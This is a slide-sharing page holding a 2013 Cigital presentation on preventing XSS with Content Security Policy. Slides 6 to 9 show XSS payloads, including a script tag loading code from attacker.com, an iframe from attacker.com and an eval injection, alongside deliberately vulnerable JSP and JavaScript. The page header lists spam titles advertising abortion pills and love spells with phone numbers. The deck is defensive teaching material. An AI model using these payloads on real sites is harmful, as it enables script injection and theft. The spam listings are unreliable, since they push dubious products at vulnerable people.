%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - Keynote
 
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security Program
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
 

Preventing XSS with Content Security Policy

  • 1. 1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. KSENIA DMITRIEVA Preventing XSS with Content Security Policy (CSP)
  • 2. 2 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Introduction Who am I? • Senior Security Consultant @Cigital • @KseniaDmitrieva • Ballroom dancer
  • 3. 3 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy (CSP) Agenda Questions to answer today: • Why do we need CSP? • What is CSP? • How is the policy configured and enforced? • How is CSP applied to existing web applications? • What improvements is CSP 1.1 bringing? • More questions?
  • 4. 4 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
  • 5. 5 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. How to Protect from XSS? Reflected Stored DB DOM-based
  • 6. 6 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=<script>alert('xss');</script> <% String search_word = "<script>alert('xss');</script>"; %> <p> Search results for <script>alert('xss');</script></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting inline JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
  • 7. 7 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/> <% String search_word = "apple<script src="http://attacker.com/parse_page.js"/>"; %> <p> Search results for apple<script src="http://attacker.com/parse_page.js"/></p> <% String search_word = request.getParameter("s"); %> <p> Search results for (<%= search_word %>)</p> Injecting a third-party JavaScript Vulnerable Server-Side JSP Code Malicious Request Server Response
  • 8. 8 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Ways to Exploit an XSS user_input="firstname'); alert('xss"; eval("display"+"('"+"firstname'); alert('xss"+"');"); Result: display('firstname'); alert('xss'); var function_name = "display"; var user_input = document.getElementById("parameter").value; eval(function_name+"('"+user_input+"');"); Result: display('firstname'); Injecting into eval() Vulnerable JavaScript Malicious Input JavaScript Result
  • 9. 9 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. What is Content Security Policy? CSP defines a list of resource directives: • script-src • connect-src • font-src • frame-src • style-src • img-src • media-src • object-src First Name Last Name Address Email Submit third-party <iframe src= "http://attacker.com/ hello.htm"> </iframe> <script> Inline JavaScript </script> <script src="https://malicioussites.com/spam.js"/> <script src="https://jquery.org/libraries/jquery.js" /> Content Security Policy: • Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval(). • Imposes restrictions on resources based on their origin.
  • 10. 10 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Sample CSP Policies Policy is sent by the server as an HTTP header: Content-Security-Policy: script-src 'self' https://apis.google.com Any malicious inline scripts or scripts hosted elsewhere will not be executed. Can a page with the following policy load an image from http://www.bbc.com/? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src * Can a page with the following policy load a script from http://attacker.com? Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; fonts-src https://themes.googleusercontent.com X Can a page with the following policy load a CSS from http://wordpress.org? Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none' Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
  • 11. 11 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting Report violations of the policy to the server: report-uri directive Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php; { "csp-report": { "document-uri": "http://example.com/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "script-src 'self' https://apis.google.com", "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php" } } Sample reported JSON: Different browsers format reports differently!
  • 12. 12 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Reporting and Enforcing • Content-Security-Policy header with report-uri enforces the policy • Content-Security-Policy-Report-Only header reports policy violations, but does not enforce the policy Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php • Use both headers: one to enforce the old policy and another to test out the new policy Content-Security-Policy: default-src 'self' *.google.com; Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
  • 13. 13 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); Without CSP With CSP Page.html mypage.js <!doctype html> <html> <head> <title>My Page</title> <script type="text/javascript"> function repeated() { ... } function clickHandler(element) { setTimeout("console.log('lapse'); repeated()", 1000); } function init() { ... } </script> </head> <body onload="init();"> <button onclick="clickHandler(this)"> Click me! </button> </body> </html>
  • 14. 14 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Externalizing JavaScript <!doctype html> <html> <head> <title>My Page</title> <script src="mypage.js"></script> </head> <body> <button>Click me!</button> </body> </html> Externalize all inline script, inline CSS, event handlers and eval() constructs. function repeated() {...} function repeatedTask() { console.log('lapse'); repeated(); } function clickHandler(e) { setTimeout(repeatedTask, 1000); } function init() {...} document.addEventListener('DOMContentLoaded', function () { document.querySelector('button') .addEventListener('click', clickHandler); init(); }); With CSP Page.html mypage.js
  • 15. 15 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. CSP Adoption http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/ CSP 1.0 is supported by the following browsers: • Internet Explorer – partial support, requires a prefix: X-Content-Security-Policy • Firefox desktop 23 Firefox for Android 30 Chrome desktop 25 Chrome for Android 35 Safari desktop 7 iOS Safari 7 Opera desktop 22 • Opera Mini – no support CSP adoption rate is slow. Most of the CSP policies use unsafe directives: unsafe-eval, unsafe-inline.
  • 16. 16 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Twitter uses CSP on all their services (January 2015). Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe- eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D %3D%3D%3D&ro=false; Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
  • 17. 17 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Real World CSP Adoption Examples Yelp uses CSP on www.yelp.com (January 2015). Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
  • 18. 18 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy 1.1 Using unsafe-eval and unsafe-inline is equal to turning the CSP off! CSP 1.1 (or level 2) addresses the issue of broken policies: • nonce-source directive • hash-source directive • policies in the <meta> tags CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014 CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30 <meta name="content-security-policy" content="script-src 'self'"/>
  • 19. 19 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Nonce Directive • Add a nonce attribute to every inline script in the page <script nonce="ZDU4eHjBDQ"> function onButtonClick() … </script> • Add the nonce directive to the script-src policy • Set a new nonce each time the page is requested • Do not automatically add a nonce to every JavaScript in the response • Add a nonce to inline JavaScript in the view template Content-Security-Policy: script-src "nonce=ZDU4eHjBDQ" 'self'
  • 20. 20 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Hash-source Directive Will the nonce directive prevent DOM-based XSS in dynamically generated JavaScript? <script> function onButtonClick() … </script> Solution: mark every inline JavaScript with a hash! • Directive 'hash-source' sends a hash of each inline script in the response • The browser hashes every inline JavaScript and compares the hashes Hash the script and add a Base64-encoded value to the CSP header: Content-Security-Policy: default-src 'self'; script-src 'sha256- MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJ lYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5 NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ==' X
  • 21. 21 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Q&A Resources: • W3C Standard for CSP 1.1 http://www.w3.org/TR/CSP11/ • CSP Reference http://content-security-policy.com/ • An Introduction to CSP by Mike West http://www.html5rocks.com/en/tutorials/security/conten t-security-policy/ • Making CSP Work for You by Mark Goodwin https://www.youtube.com/watch?v=F7eCP08nacI&t=2h1 4m16s • Automatic XSS protection with CSP by Neil Matatall https://blog.matatall.com/2013/09/automatic-xss- protection-with-csp-no-changes-required/ • Generating Content-Security-Policies, the easy way http://c0nrad.io/blog/csp.html
  • 22. 22 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. @KseniaDmitrieva kdmitrieva@cigital.com